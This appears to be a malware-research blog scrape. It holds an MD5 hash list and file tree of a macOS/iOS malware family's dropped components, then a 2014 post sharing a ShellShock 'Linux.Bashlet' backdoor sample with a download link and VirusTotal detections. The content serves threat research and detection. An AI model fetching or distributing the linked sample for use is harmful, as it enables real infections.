<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">globalupdate</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">9037cf29ed485dae11e22955724a00e7</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">itunesupdate</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">a8dfbd54da805d3c52afc521ab7b354b</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libcrypto.1.0.0.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">4c5384d667215098badb4e850890127b</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libcrypto.1.0.0.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">3b533eeb80ee14191893e9a73c017445</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libiconv.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">94f9882f5db1883e7295b44c440eb44c</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libiconv.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">fac8ef9dabdb92806ea9b1fde43ad746</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libimobiledevice.4.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">c596adb32c143430240abbf5aff02bc0</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libimobiledevice.4.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">5b0412e19ec0af5ce375b8ab5a0bc5db</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libiodb.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">bc3aa0142fb15ea65de7833d65a70e36</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">liblzma.5.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">5bdfd2a20123e0893ef59bd813b24105</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">liblzma.5.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">9ebf9c0d25e418c8d0bed2a335aac8bf</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libplist.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">903cbde833c91b197283698b2400fc9b</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libplist.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">109a09389abef9a9388de08f7021b4cf</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libssl.1.0.0.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">49b937c9ff30a68a0f663828be7ea704</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libssl.1.0.0.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">ab09435c0358b102a5d08f34aae3c244</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libusbmuxd.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">e8e0663c7c9d843e0030b15e59eb6f52</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libusbmuxd.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">9efb552097cf4a408ea3bab4aa2bc957</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libxml2.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">34f14463f28d11bd0299f0d7a3985718</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libxml2.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">95506f9240efb416443fcd6d82a024b9</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libz.1.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">28ef588ba7919f751ae40719cf5cffc6</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libz.1.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">f2b19c7a58e303f0a159a44d08c6df63</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">libzip.2.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">2a42736c8eae3a4915bced2c6df50397</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">machook</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">5b43df4fac4cac52412126a6c604853c</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">machook</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">ecb429951985837513fdf854e49d0682</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">periodicdate</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">aa6fe189baa355a65e6aafac1e765f41</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">pphelper</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">2b79534f22a89f73d4bb45848659b59b</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">sfbase.dylib</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">bc3aa0142fb15ea65de7833d65a70e36</span><br />
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
sfbase.dylib<span class="Apple-tab-span" style="white-space: pre;"> </span>bc3aa0142fb15ea65de7833d65a70e36<br />
sfbase_v4000.dylib<span class="Apple-tab-span" style="white-space: pre;"> </span>582fcd682f0f520e95af1d0713639864<br />
sfbase_v4001.dylib<span class="Apple-tab-span" style="white-space: pre;"> </span>e40de392c613cd2f9e1e93c6ffd05246<br />
start<span class="Apple-tab-span" style="white-space: pre;"> </span>e3a61139735301b866d8d109d715f102<br />
start<span class="Apple-tab-span" style="white-space: pre;"> </span>e3a61139735301b866d8d109d715f102<br />
start.sh<span class="Apple-tab-span" style="white-space: pre;"> </span>3fa4e5fec53dfc9fc88ced651aa858c6<br />
stty5.11.pl<span class="Apple-tab-span" style="white-space: pre;"> </span>dea26a823839b1b3a810d5e731d76aa2<br />
stty5.11.pl<span class="Apple-tab-span" style="white-space: pre;"> </span>dea26a823839b1b3a810d5e731d76aa2<br />
systemkeychain-helper<span class="Apple-tab-span" style="white-space: pre;"> </span>e03402006332a6e17c36e569178d2097<br />
watch.sh<span class="Apple-tab-span" style="white-space: pre;"> </span>358c48414219fdbbbbcff90c97295dff<br />
WatchProc<span class="Apple-tab-span" style="white-space: pre;"> </span>a72fdbacfd5be14631437d0ab21ff960<br />
7b9e685e89b8c7e11f554b05cdd6819a<span class="Apple-tab-span" style="white-space: pre;"> </span>7b9e685e89b8c7e11f554b05cdd6819a<br />
update<span class="Apple-tab-span" style="white-space: pre;"> </span>93658b52b0f538c4f3e17fdf3860778c<br />
start.sh<span class="Apple-tab-span" style="white-space: pre;"> </span>9adfd4344092826ca39bbc441a9eb96f<br />
<div>
<br /></div>
</div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
File listing</div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">├───databases</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ foundation</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">├───dropped</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ ├───version_A</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ com.apple.globalupdate.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ com.apple.machook_damon.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ globalupdate</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ machook</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ sfbase.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ watch.sh</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ ├───dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libcrypto.1.0.0.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libiconv.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libimobiledevice.4.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ liblzma.5.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libplist.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libssl.1.0.0.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libusbmuxd.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libxml2.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │ libz.1.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ │</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ ├───log</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ └───update</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ ├───version_B</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.globalupdate.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.itunesupdate.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.machook_damon.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.watchproc.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ globalupdate</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ itunesupdate</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ machook</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ start</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ WatchProc</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ └───version_C</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.appstore.plughelper.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.appstore.PluginHelper</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.MailServiceAgentHelper</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.MailServiceAgentHelper.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.periodic-dd-mm-yy.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ com.apple.systemkeychain-helper.plist</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ periodicdate</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ stty5.11.pl</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │ systemkeychain-helper</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ │</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ └───manpath.d</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libcrypto.1.0.0.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libiconv.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libimobiledevice.4.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libiodb.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ liblzma.5.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libplist.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libssl.1.0.0.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libusbmuxd.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libxml2.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libz.1.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ libzip.2.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">├───iOS</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ sfbase.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ sfbase_v4000.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ sfbase_v4001.dylib</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ start</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ stty5.11.pl</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">├───IPAs</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ 7b9e685e89b8c7e11f554b05cdd6819a</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ pphelper</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">├───original</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ BikeBaron</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ CleanApp</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ FontMap1.cfg</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│ start.sh</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">│</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">└───update</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> start.sh</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> update</span></div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-15569706837811566122014-10-02T08:12:00.000-04:002014-10-02T08:12:08.281-04:00ShellShock payload sample Linux.Bashlet<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfOyh2luYvVugDtu6RxESwcONOhYzpLRp0jZgc7Z_sp6-aRz3OJ8ckiEKbdTXAf05v8mHS-AE5DYxjiOLR9xAi0RZ99LRDEUoNlz2k1VAF6mplM6qQiIsrvCbAj_LWhGonOWue6IQeP1s/s1600/elf.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfOyh2luYvVugDtu6RxESwcONOhYzpLRp0jZgc7Z_sp6-aRz3OJ8ckiEKbdTXAf05v8mHS-AE5DYxjiOLR9xAi0RZ99LRDEUoNlz2k1VAF6mplM6qQiIsrvCbAj_LWhGonOWue6IQeP1s/s1600/elf.PNG" height="100" width="320" /></a></div>
Someone kindly shared their sample of the shellshock malware described by the Malware Must die group - you can read their analysis here:<br />
<div>
<a href="http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html?m=1">MMD-0027-2014 - Linux ELF bash 0day (shellshock): The fun has only just begun...</a><br />
<br />
<br /></div>
<div>
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><b>Download</b></span></div>
<div>
<div style="font-size: 14px; line-height: 19px;">
<br />
<b><br />
</b></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="font-family: 'Courier New', Courier, monospace; font-size: 14px;" /></a><a href="http://www.mediafire.com/download/vqv3walqa61scyo/fu4k_2485040231A35B7A465361FAF92A512d.zip">Download. Email me if you need the password</a><br />
<br />
<br />
<br />
<a name='more'></a><br />
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><b>File Information</b></span></div>
</div>
</div>
<br />
File: fu4k_2485040231A35B7A465361FAF92A512D<br />
Size: 152<br />
MD5: 2485040231A35B7A465361FAF92A512<br />
<br />
<br />
VIrustotal<br />
<br />
SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81<br />
File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>trzA114.tmp<br />
Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>22 / 55<br />
Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )<br />
Antivirus<span class="Apple-tab-span" style="white-space: pre;"> </span>Result<span class="Apple-tab-span" style="white-space: pre;"> </span>Update<br />
Ad-Aware<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Avast<span class="Apple-tab-span" style="white-space: pre;"> </span>ELF:Shellshock-A [Expl]<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Avira<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux/Small.152.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
BitDefender<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
DrWeb<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.BackDoor.Shellshock.2<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux/Agent.AB<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Emsisoft<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H (B)<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141001<br />
Fortinet<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux/Small.CU!tr<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
GData<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Linux.Small<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
K7AntiVirus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan ( 0001140e1 )<span class="Apple-tab-span" style="white-space: pre;"> </span>20141001<br />
K7GW<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan ( 0001140e1 )<span class="Apple-tab-span" style="white-space: pre;"> </span>20141001<br />
Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Linux.Small.cu<span class="Apple-tab-span" style="white-space: pre;"> </span>20141001<br />
MicroWorld-eScan<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Qihoo-360<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Generic<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Sophos<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux/Bdoor-BGG<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Symantec<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Bashlet<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
Tencent<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32.Trojan.Gen.Vdat<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
TrendMicro<span class="Apple-tab-span" style="white-space: pre;"> </span>ELF_BASHLET.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
TrendMicro-HouseCall<span class="Apple-tab-span" style="white-space: pre;"> </span>ELF_BASHLET.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141002<br />
nProtect<span class="Apple-tab-span" style="white-space: pre;"> </span>Linux.Backdoor.H<span class="Apple-tab-span" style="white-space: pre;"> </span>20141001</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0